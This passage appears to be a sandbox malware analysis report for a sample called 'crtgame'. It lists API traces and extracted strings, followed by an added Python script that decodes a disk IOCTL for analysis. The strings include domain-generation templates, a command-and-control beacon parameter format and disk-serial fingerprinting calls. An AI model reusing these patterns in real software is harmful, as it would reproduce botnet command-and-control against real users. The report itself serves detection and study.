GetEnvironmentStringsW 15357->15402 15361 2bd36cd 15358->15361 15362 2bd3666 __CRT_INIT@12 15359->15362 15364 2bd36eb 15361->15364 15365 2bd36d3 15361->15365 15508 2bd367f 15362->15508 15368 2bd2974 __freefls@4 59 API calls 15364->15368 15367 2bd56e1 __initptd 59 API calls 15365->15367 15370 2bd36db GetCurrentThreadId 15367->15370 15368->15349 15369 2bd35f0 15371 2bd35f4 15369->15371 15434 2bdafd4 15369->15434 15370->15349 15467 2bd580a 15371->15467 15375 2bd3614 15375->15349 15476 2bdaf7f 15375->15476 15380->15339 15520 2bd7f02 RtlEncodePointer 15381->15520 15383 2bd5799 15525 2bd8420 15383->15525 15386 2bd57a2 15387 2bd580a __mtterm 62 API calls 15386->15387 15389 2bd57a7 15387->15389 15389->15350 15391 2bd57bf 15392 2bd846e __calloc_crt 59 API calls 15391->15392 15393 2bd57cc 15392->15393 15394 2bd5801 15393->15394 15396 2bd8bea __getptd_noexit TlsSetValue 15393->15396 15395 2bd580a __mtterm 62 API calls 15394->15395 15397 2bd5806 15395->15397 15398 2bd57e0 15396->15398 15397->15350 15398->15394 15399 2bd57e6 15398->15399 15400 2bd56e1 __initptd 59 API calls 15399->15400 15401 2bd57ee GetCurrentThreadId 15400->15401 15401->15350 15404 2bdb393 15402->15404 15408 2bd35e6 15402->15408 15403 2bdb3ab WideCharToMultiByte 15405 2bdb3fd FreeEnvironmentStringsW 15403->15405 15406 2bdb3c6 15403->15406 15404->15403 15404->15404 15405->15408 15407 2bd84b6 __malloc_crt 59 API calls 15406->15407 15409 2bdb3cc 15407->15409 15415 2bdaccb 15408->15415 15409->15405 15410 2bdb3d3 WideCharToMultiByte 15409->15410 15411 2bdb3e9 15410->15411 15412 2bdb3f2 FreeEnvironmentStringsW 15410->15412 15413 2bd2974 __freefls@4 59 API calls 15411->15413 15412->15408 15414 2bdb3ef 15413->15414 15414->15412 15416 2bdacd7 ___lock_fhandle 15415->15416 15417 2bd82ef __lock 59 API calls 15416->15417 15418 2bdacde 15417->15418 15419 2bd846e __calloc_crt 59 API calls 15418->15419 15420 2bdacef 15419->15420 15421 2bdad5a GetStartupInfoW 15420->15421 15422 2bdacfa ___lock_fhandle @_EH4_CallFilterFunc@8 
15420->15422 15429 2bdae9e 15421->15429 15430 2bdad6f 15421->15430 15422->15369 15423 2bdaf66 15533 2bdaf76 15423->15533 15425 2bd846e __calloc_crt 59 API calls 15425->15430 15426 2bdaeeb GetStdHandle 15426->15429 15427 2bdadbd 15427->15429 15431 2bdadf1 GetFileType 15427->15431 15432 2bd8c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15427->15432 15428 2bdaefe GetFileType 15428->15429 15429->15423 15429->15426 15429->15428 15433 2bd8c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15429->15433 15430->15425 15430->15427 15430->15429 15431->15427 15432->15427 15433->15429 15435 2bdafe7 GetModuleFileNameA 15434->15435 15436 2bdafe2 15434->15436 15437 2bdb014 15435->15437 15543 2bd4c8a 15436->15543 15537 2bdb087 15437->15537 15441 2bd84b6 __malloc_crt 59 API calls 15442 2bdb04d 15441->15442 15443 2bdb087 _parse_cmdline 59 API calls 15442->15443 15444 2bd3600 15442->15444 15443->15444 15444->15375 15445 2bdb203 15444->15445 15446 2bdb20c 15445->15446 15449 2bdb211 std::exception::_Copy_str 15445->15449 15447 2bd4c8a ___initmbctable 71 API calls 15446->15447 15447->15449 15448 2bd3609 15448->15375 15461 2bd7e6a 15448->15461 15449->15448 15450 2bd846e __calloc_crt 59 API calls 15449->15450 15457 2bdb247 std::exception::_Copy_str 15450->15457 15451 2bdb299 15452 2bd2974 __freefls@4 59 API calls 15451->15452 15452->15448 15453 2bd846e __calloc_crt 59 API calls 15453->15457 15454 2bdb2c0 15455 2bd2974 __freefls@4 59 API calls 15454->15455 15455->15448 15457->15448 15457->15451 15457->15453 15457->15454 15458 2bdb2d7 15457->15458 15747 2bd66bc 15457->15747 15459 2bd4905 __invoke_watson 8 API calls 15458->15459 15460 2bdb2e3 15459->15460 15462 2bd7e76 __IsNonwritableInCurrentImage 15461->15462 15756 2bdccdf 15462->15756 15464 2bd7e94 __initterm_e 15465 2bd2da4 __cinit 68 API calls 15464->15465 15466 2bd7eb3 _doexit __IsNonwritableInCurrentImage 15464->15466 15465->15466 15466->15375 15468 2bd5814 15467->15468 15469 2bd581a 15467->15469 15759 2bd8bac 
15468->15759 15471 2bd8339 RtlDeleteCriticalSection 15469->15471 15472 2bd8355 15469->15472 15473 2bd2974 __freefls@4 59 API calls 15471->15473 15474 2bd8361 RtlDeleteCriticalSection 15472->15474 15475 2bd8374 15472->15475 15473->15469 15474->15472 15475->15349 15478 2bdaf86 15476->15478 15477 2bdafce 15477->15371 15478->15477 15479 2bd2974 __freefls@4 59 API calls 15478->15479 15480 2bdaf9f RtlDeleteCriticalSection 15478->15480 15479->15478 15480->15478 15482 2bd7fa6 _doexit 59 API calls 15481->15482 15483 2bd7e66 15482->15483 15483->15342 15485 2bd7d4c 15484->15485 15486 2bd7d5e 15484->15486 15485->15486 15488 2bd2974 __freefls@4 59 API calls 15485->15488 15487 2bd2974 __freefls@4 59 API calls 15486->15487 15489 2bd7d6b 15487->15489 15488->15485 15490 2bd7d8f 15489->15490 15493 2bd2974 __freefls@4 59 API calls 15489->15493 15491 2bd2974 __freefls@4 59 API calls 15490->15491 15492 2bd7d9b 15491->15492 15494 2bd2974 __freefls@4 59 API calls 15492->15494 15493->15489 15495 2bd7dac 15494->15495 15496 2bd2974 __freefls@4 59 API calls 15495->15496 15497 2bd7db7 15496->15497 15498 2bd7ddc RtlEncodePointer 15497->15498 15501 2bd2974 __freefls@4 59 API calls 15497->15501 15499 2bd7df7 15498->15499 15500 2bd7df1 15498->15500 15503 2bd7e0d 15499->15503 15506 2bd2974 __freefls@4 59 API calls 15499->15506 15502 2bd2974 __freefls@4 59 API calls 15500->15502 15505 2bd7ddb 15501->15505 15502->15499 15504 2bd3655 15503->15504 15507 2bd2974 __freefls@4 59 API calls 15503->15507 15504->15354 15504->15362 15505->15498 15506->15503 15507->15504 15509 2bd3691 15508->15509 15510 2bd3683 15508->15510 15509->15349 15510->15509 15511 2bd580a __mtterm 62 API calls 15510->15511 15511->15509 15513 2bd5631 15512->15513 15519 2bd5657 15512->15519 15514 2bd563f 15513->15514 15515 2bd8bcb __getptd_noexit TlsGetValue 15513->15515 15516 2bd8bea __getptd_noexit TlsSetValue 15514->15516 15515->15514 15517 2bd564f 15516->15517 15762 2bd54ef 15517->15762 15519->15349 15521 2bd7f13 __init_pointers 
__initp_misc_winsig 15520->15521 15532 2bd3407 RtlEncodePointer 15521->15532 15523 2bd7f2b __init_pointers 15524 2bd8c7a 34 API calls 15523->15524 15524->15383 15526 2bd842c 15525->15526 15527 2bd8c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 15526->15527 15528 2bd579e 15526->15528 15527->15526 15528->15386 15529 2bd8b8e 15528->15529 15530 2bd57b4 15529->15530 15531 2bd8ba5 TlsAlloc 15529->15531 15530->15386 15530->15391 15532->15523 15536 2bd8459 RtlLeaveCriticalSection 15533->15536 15535 2bdaf7d 15535->15422 15536->15535 15539 2bdb0a9 15537->15539 15541 2bdb10d 15539->15541 15547 2be0fd6 15539->15547 15540 2bdb02a 15540->15441 15540->15444 15541->15540 15542 2be0fd6 _parse_cmdline 59 API calls 15541->15542 15542->15541 15544 2bd4c9a 15543->15544 15545 2bd4c93 15543->15545 15544->15435 15635 2bd4fe7 15545->15635 15550 2be0f7c 15547->15550 15553 2bd1c7b 15550->15553 15554 2bd1c8c 15553->15554 15560 2bd1cd9 15553->15560 15561 2bd565a 15554->15561 15557 2bd1cb9 15557->15560 15581 2bd4f41 15557->15581 15560->15539 15562 2bd5672 __getptd_noexit 59 API calls 15561->15562 15563 2bd5660 15562->15563 15564 2bd1c92 15563->15564 15565 2bd7e3f __amsg_exit 59 API calls 15563->15565 15564->15557 15566 2bd4bbf 15564->15566 15565->15564 15567 2bd4bcb ___lock_fhandle 15566->15567 15568 2bd565a FindHandlerForForeignException 59 API calls 15567->15568 15569 2bd4bd4 15568->15569 15570 2bd4c03 15569->15570 15571 2bd4be7 15569->15571 15572 2bd82ef __lock 59 API calls 15570->15572 15574 2bd565a FindHandlerForForeignException 59 API calls 15571->15574 15573 2bd4c0a 15572->15573 15593 2bd4c3f 15573->15593 15576 2bd4bec 15574->15576 15579 2bd4bfa ___lock_fhandle 15576->15579 15580 2bd7e3f __amsg_exit 59 API calls 15576->15580 15579->15557 15580->15579 15582 2bd4f4d ___lock_fhandle 15581->15582 15583 2bd565a FindHandlerForForeignException 59 API calls 15582->15583 15584 2bd4f57 15583->15584 15585 2bd4f69 15584->15585 15586 2bd82ef __lock 59 API calls 15584->15586 15587 2bd4f77 
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.NTDLL(02BF73D8), ref: 02BC5F43
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02BC5F5A
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BC5F63
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02BC5F72
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BC5F75
                                                                            • Part of subcall function 02BCF1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02BCF235
                                                                            • Part of subcall function 02BCF1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02BCF256
                                                                            • Part of subcall function 02BCF1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02BCF26A
                                                                            • Part of subcall function 02BCF1E7: CloseHandle.KERNEL32(00000000), ref: 02BCF273
                                                                          • GetTickCount.KERNEL32 ref: 02BC5FB6
                                                                          • GetVersionExA.KERNEL32(02BF7030), ref: 02BC5FE3
                                                                          • _memset.LIBCMT ref: 02BC6000
                                                                          • _malloc.LIBCMT ref: 02BC600D
                                                                          • _malloc.LIBCMT ref: 02BC601D
                                                                          • _malloc.LIBCMT ref: 02BC602B
                                                                          • _malloc.LIBCMT ref: 02BC6036
                                                                          • _malloc.LIBCMT ref: 02BC6041
                                                                          • _malloc.LIBCMT ref: 02BC604C
                                                                          • _malloc.LIBCMT ref: 02BC6057
                                                                          • _malloc.LIBCMT ref: 02BC6066
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02BC607D
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC6086
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC6095
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC6098
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC60A3
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC60A6
                                                                          • _memset.LIBCMT ref: 02BC60B9
                                                                          • _memset.LIBCMT ref: 02BC60C5
                                                                          • _memset.LIBCMT ref: 02BC60D2
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC60E0
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC60ED
                                                                          • _malloc.LIBCMT ref: 02BC6111
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          • _malloc.LIBCMT ref: 02BC611F
                                                                          • _malloc.LIBCMT ref: 02BC6126
                                                                          • _malloc.LIBCMT ref: 02BC614A
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02BC615A
                                                                          • Sleep.KERNELBASE ref: 02BC6168
                                                                          • _malloc.LIBCMT ref: 02BC6174
                                                                          • _malloc.LIBCMT ref: 02BC6181
                                                                          • _memset.LIBCMT ref: 02BC6196
                                                                          • _memset.LIBCMT ref: 02BC61A6
                                                                          • Sleep.KERNELBASE(00001388), ref: 02BC61C2
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC61CD
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC61DE
                                                                          • _memset.LIBCMT ref: 02BC6233
                                                                          • _memset.LIBCMT ref: 02BC6242
                                                                          • GetTickCount.KERNEL32 ref: 02BC62E5
                                                                          • _memset.LIBCMT ref: 02BC630F
                                                                          • wsprintfA.USER32 ref: 02BC6C3B
                                                                          • _memset.LIBCMT ref: 02BC6C5C
                                                                          • _memset.LIBCMT ref: 02BC6C6C
                                                                          • _memset.LIBCMT ref: 02BC6C9B
                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02BC6D3D
                                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02BC6D65
                                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02BC6D7D
                                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02BC6D95
                                                                          • _memset.LIBCMT ref: 02BC6DA5
                                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02BC6DBE
                                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02BC6DDD
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02BC6DF7
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02BC6E02
                                                                          • _memset.LIBCMT ref: 02BC6E4D
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC6E72
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC6E83
                                                                          • _malloc.LIBCMT ref: 02BC6F0A
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC6F1C
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC6F28
                                                                          • _memset.LIBCMT ref: 02BC6F42
                                                                          • _memset.LIBCMT ref: 02BC6F51
                                                                          • _memset.LIBCMT ref: 02BC6F61
                                                                          • _memset.LIBCMT ref: 02BC6F70
                                                                          • _memset.LIBCMT ref: 02BC6F82
                                                                          • _malloc.LIBCMT ref: 02BC6FFC
                                                                          • _memset.LIBCMT ref: 02BC700D
                                                                          • _strtok.LIBCMT ref: 02BC702D
                                                                          • _swscanf.LIBCMT ref: 02BC7044
                                                                          • _strtok.LIBCMT ref: 02BC705B
                                                                          • Sleep.KERNEL32(000007D0), ref: 02BC7162
                                                                          • _memset.LIBCMT ref: 02BC71D6
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC71E3
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC71F5
                                                                          • _sprintf.LIBCMT ref: 02BC728A
                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC734E
                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC7382
                                                                            • Part of subcall function 02BC5D1D: _malloc.LIBCMT ref: 02BC5D2B
                                                                          • _malloc.LIBCMT ref: 02BC7583
                                                                          • _memset.LIBCMT ref: 02BC758F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _memset$_malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                          • String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                          • API String ID: 2018021302-1381308451
                                                                          • Opcode ID: 0f07d023c36c2de5cf5a4dd3df5db7851bf45487ae999b5f11cb963dafc8bf85
                                                                          • Instruction ID: 9e3c9d2e6329a35d8987181992355605eccad3719d7ef9f18c519d159397008c
                                                                          • Opcode Fuzzy Hash: 0f07d023c36c2de5cf5a4dd3df5db7851bf45487ae999b5f11cb963dafc8bf85
                                                                          • Instruction Fuzzy Hash: B7D205B36187905ED3119A2C9C81F7FFBECAF89304F5809ADF5D5C6142C668C606CBA2

                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02BCF3B6
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02BCF3CF
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02BCF3F4
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 02BCF47D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                          • API String ID: 514930453-3114217049
                                                                          • Opcode ID: 0e4e6741fef77620505972d7ab3386d3ac05bdf21af58ff0df90fc26a1e3d3bc
                                                                          • Instruction ID: 20a72a4a124be68f6d5137e9c8d1e610f76d6e0647d201e947593a9965ad16eb
                                                                          • Opcode Fuzzy Hash: 0e4e6741fef77620505972d7ab3386d3ac05bdf21af58ff0df90fc26a1e3d3bc
                                                                          • Instruction Fuzzy Hash: DF21A571E04209ABDF14DBA8D840AFEBBFAEF44314F2840EEE545E7601D7308945CBA0

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02BC2BE4
                                                                          • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02BC2C07
                                                                            • Part of subcall function 02BC9E92: WSAGetLastError.WS2_32(?,00000080,00000017,02BC3114), ref: 02BC9EA0
                                                                          • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02BC2CD3
                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02BC2CE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Recvselect
                                                                          • String ID: 3'
                                                                          • API String ID: 886190287-280543908
                                                                          • Opcode ID: a45d365888b081351bba4ec532f0b815e81737998dab146e544179c6bf134561
                                                                          • Instruction ID: adb0a06a76ec7daa368a8e4ddb2799ddddab658afbb474da3f5db2b42bb8fcbb
                                                                          • Opcode Fuzzy Hash: a45d365888b081351bba4ec532f0b815e81737998dab146e544179c6bf134561
                                                                          • Instruction Fuzzy Hash: 3C416CB19143059FDB10AF64C5447ABBBE9EF94364F204D9EEC9987281EBB0D540CB92

                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02BCF2BB
                                                                          • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02BCF2F9
                                                                          • GetLastError.KERNEL32 ref: 02BCF35A
                                                                          • CloseHandle.KERNELBASE(?), ref: 02BCF391
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: f2a1b2489862e0558128b339874540c0272caafa4c23c6c4afea4c04571c9cca
                                                                          • Instruction ID: ceced9f9cbcf60534da79e33ea68e57f77b391b03a9553cdf8e81cd823f6e738
                                                                          • Opcode Fuzzy Hash: f2a1b2489862e0558128b339874540c0272caafa4c23c6c4afea4c04571c9cca
                                                                          • Instruction Fuzzy Hash: F4318F71E00219FBDF24DF94D884AFEBBBAEB84754F2081EEE505A7680D7745A44CB90
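The two calls above are worth decoding rather than reading as raw numbers. 0x002D1400 is the NT control code IOCTL_STORAGE_QUERY_PROPERTY (device type 0x2D FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS); the 0xC-byte input buffer matches sizeof(STORAGE_PROPERTY_QUERY) and the 0x400-byte output buffer is where a STORAGE_DEVICE_DESCRIPTOR with its vendor, product and serial-number strings lands. The handle on \\.\PhysicalDrive0 is opened with dwDesiredAccess 0, which permits device-attribute queries but neither reads nor writes sectors, so this function is consistent with collecting a disk serial for a machine fingerprint (its caller, listed further down in this section, also calls GetAdaptersInfo and GetFileTime on the Windows directory) rather than with boot-sector tampering. The "Contains functionality to infect the boot sector" signature in the overview is most likely triggered by the raw-device open alone and should be weighed against the access mask before it is repeated in a write-up. The script below is an added example and not part of the Joe Sandbox report: it parses API lines in this page's format and splits the control code into its CTL_CODE fields. The regex, the small lookup tables and the sample lines are this example's own; the sample lines are copied from the listing above.

```python
import re
from typing import Dict, List

# Constructed sample: two API lines in the format this report uses, copied from
# the function above (the page's bullet and indentation are optional).
SAMPLE_LINES = [
    r"CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02BCF2BB",
    r"DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02BCF2F9",
]

API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_line(line: str) -> Dict[str, object]:
    """Split 'Api.MODULE(arg,arg,...), ref: ADDR' into its parts.
    Eight-hex-digit arguments become ints; '?' and resolved strings stay text.
    Assumption of this example: no resolved string argument contains a comma."""
    m = API_LINE.match(line)
    if m is None:
        raise ValueError(f"not an API line: {line!r}")
    args: List[object] = []
    for a in m.group("args").split(","):
        a = a.strip()
        args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else a)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


# CTL_CODE(DeviceType, Function, Method, Access) layout from winioctl.h:
#   bits 31..16 device type, 15..14 required access, 13..2 function, 1..0 transfer method.
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x22: "FILE_DEVICE_UNKNOWN", 0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS", "FILE_READ_ACCESS|FILE_WRITE_ACCESS")


def ctl_code(device: int, function: int, method: int, access: int) -> int:
    return (device << 16) | (access << 14) | (function << 2) | method


# Only codes this example can vouch for; extend from winioctl.h as needed.
KNOWN_IOCTLS = {
    ctl_code(0x2D, 0x500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",    # 0x002D1400
    ctl_code(0x2D, 0x420, 0, 0): "IOCTL_STORAGE_GET_DEVICE_NUMBER",  # 0x002D1080
    ctl_code(0x07, 0x000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",    # 0x00070000
}


def decode_ctl_code(code: int) -> Dict[str, object]:
    """Split an NT I/O control code into its CTL_CODE() fields."""
    device = (code >> 16) & 0xFFFF
    return {
        "code": code,
        "name": KNOWN_IOCTLS.get(code),
        "device_type": device,
        "device_type_name": DEVICE_TYPES.get(device, f"0x{device:X}"),
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "access": ACCESS[(code >> 14) & 0x3],
    }


GENERIC_READ, GENERIC_WRITE, GENERIC_ALL = 0x80000000, 0x40000000, 0x10000000
FILE_READ_DATA, FILE_WRITE_DATA = 0x0001, 0x0002


def summarize_raw_device_access(lines: List[str]) -> Dict[str, object]:
    """Pair a CreateFile on a \\\\.\\ device path with the DeviceIoControl calls
    listed with it and state what the access mask actually permits."""
    ioctls: List[Dict[str, object]] = []
    out: Dict[str, object] = {"device": None, "desired_access": None,
                              "can_read_sectors": False, "can_write_sectors": False,
                              "ioctls": ioctls}
    for call in (parse_api_line(l) for l in lines):
        if call["api"] in ("CreateFileA", "CreateFileW"):
            path, access = call["args"][0], call["args"][1]
            if isinstance(path, str) and path.startswith("\\\\.\\") and isinstance(access, int):
                out["device"] = path
                out["desired_access"] = access
                out["can_read_sectors"] = bool(access & (GENERIC_READ | GENERIC_ALL | FILE_READ_DATA))
                out["can_write_sectors"] = bool(access & (GENERIC_WRITE | GENERIC_ALL | FILE_WRITE_DATA))
        elif call["api"] == "DeviceIoControl" and isinstance(call["args"][1], int):
            ioctl = decode_ctl_code(call["args"][1])
            ioctl["in_size"] = call["args"][3]    # nInBufferSize
            ioctl["out_size"] = call["args"][5]   # nOutBufferSize
            ioctls.append(ioctl)
    return out


if __name__ == "__main__":
    for key, value in summarize_raw_device_access(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Feed it any function's API list from a report of this format; a raw-device open whose mask includes GENERIC_WRITE or FILE_WRITE_DATA, or an IOCTL with FILE_WRITE_ACCESS in its access bits, is the combination that actually supports the boot-sector claim.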

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 02BC5C48
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          • _memset.LIBCMT ref: 02BC5C5B
                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02BC5C68
                                                                          • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02BC5C70
                                                                          • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02BC5C7C
                                                                          • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02BC5C95
                                                                          • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02BC5CAA
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02BC5CB1
                                                                          • __time64.LIBCMT ref: 02BC5CC5
                                                                          • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02BC5CE2
                                                                          • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02BC5CF7
                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02BC5CFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloc_memsetlstrcatlstrcpy
                                                                          • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                          • API String ID: 204396691-2903805982
                                                                          • Opcode ID: 717b93fb9dab002a59c0b8b52d1c47c6959390d71a8ab3e5e5bafe605bc79879
                                                                          • Instruction ID: 2551820f7fdc657016e7290b1a93fb8aed5ea777f7d169190fb5f3f20edb7e06
                                                                          • Opcode Fuzzy Hash: 717b93fb9dab002a59c0b8b52d1c47c6959390d71a8ab3e5e5bafe605bc79879
